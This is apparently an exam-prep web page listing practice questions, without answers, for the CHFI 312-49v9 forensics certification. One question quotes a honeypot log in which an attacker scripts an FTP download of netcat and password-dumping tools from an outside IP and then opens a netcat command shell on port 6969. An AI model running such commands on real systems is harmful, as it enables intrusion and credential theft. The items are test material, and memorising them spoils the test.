Exact2Pass
Last Update 12 hours ago Total Questions : 589
The Computer Hacking Forensic Investigator (v9) content is now fully updated, with all current exam questions added 12 hours ago. Deciding to include 312-49v9 practice exam questions in your study plan goes far beyond basic test preparation.
You'll find that our 312-49v9 exam questions frequently feature detailed scenarios and practical problem-solving exercises that directly mirror industry challenges. Engaging with these 312-49v9 sample sets allows you to effectively manage your time and pace yourself, giving you the ability to finish any Computer Hacking Forensic Investigator (v9) practice test comfortably within the allotted time.
Office Documents (Word, Excel and PowerPoint) contain a code that allows tracking the MAC or unique identifier of the machine that created the document. What is that code called?
When reviewing web logs, you see an entry for resource not found in the HTTP status code filed.
What is the actual error code that you would see in the log for resource not found?
The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini.
He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below.
" cmd1.exe /c open 213.116.251.162 > ftpcom "
" cmd1.exe /c echo johna2k > > ftpcom "
" cmd1.exe /c echo haxedj00 > > ftpcom "
" cmd1.exe /c echo get nc.exe > > ftpcom "
" cmd1.exe /c echo get pdump.exe > > ftpcom "
" cmd1.exe /c echo get samdump.dll > > ftpcom "
" cmd1.exe /c echo quit > > ftpcom "
" cmd1.exe /c ftp -s:ftpcom "
" cmd1.exe /c nc -l -p 6969 -e cmd1.exe "
What can you infer from the exploit given?
What does mactime, an essential part of the coroner ' s toolkit do?
When you are running a vulnerability scan on a network and the IDS cuts off your connection, what type of IDS is being used?
You are called in to assist the police in an investigation involving a suspected drug dealer. The suspects house was searched by the police after a warrant was obtained and they located a floppy disk in the suspects bedroom. The disk contains several files, but they appear to be password protected. What are two common methods used by password cracking software that you can use to obtain the password?
Jim performed a vulnerability analysis on his network and found no potential problems. He runs another utility that executes exploits against his system to verify the results of the vulnerability test.
The second utility executes five known exploits against his network in which the vulnerability analysis said were not exploitable. What kind of results did Jim receive from his vulnerability analysis?
An Employee is suspected of stealing proprietary information belonging to your company that he had no rights to possess. The information was stored on the Employees Computer that was protected with the NTFS Encrypted File System (EFS) and you had observed him copy the files to a floppy disk just before leaving work for the weekend. You detain the Employee before he leaves the building and recover the floppy disks and secure his computer. Will you be able to break the encryption so that you can verify that that the employee was in possession of the proprietary information?
James is testing the ability of his routers to withstand DoS attacks. James sends ICMP ECHO requests to the broadcast address of his network. What type of DoS attack is James testing against his network?
Jacob is a computer forensics investigator with over 10 years of experience in investigations and has written over 50 articles on computer forensics. He has been called upon as a qualified witness to testify the accuracy and integrity of the technical log files gathered in an investigation into computer fraud. What is the term used for Jacob’s testimony in this case?
Smith is an IT technician that has been appointed to his company ' s network vulnerability assessment team. He is the only IT employee on the team. The other team members include employees from
Accounting, Management, Shipping, and Marketing. Smith and the team members are having their first meeting to discuss how they will proceed. What is the first step they should do to create the network
vulnerability assessment plan?
Sheila is a forensics trainee and is searching for hidden image files on a hard disk. She used a forensic investigation tool to view the media in hexadecimal code for simplifying the search process. Which of the following hex codes should she look for to identify image files?
Which list contains the most recent actions performed by a Windows User?
Raw data acquisition format creates _________ of a data set or suspect drive.
MAC filtering is a security access control methodology, where a ___________ is assigned to each network card to determine access to the network.
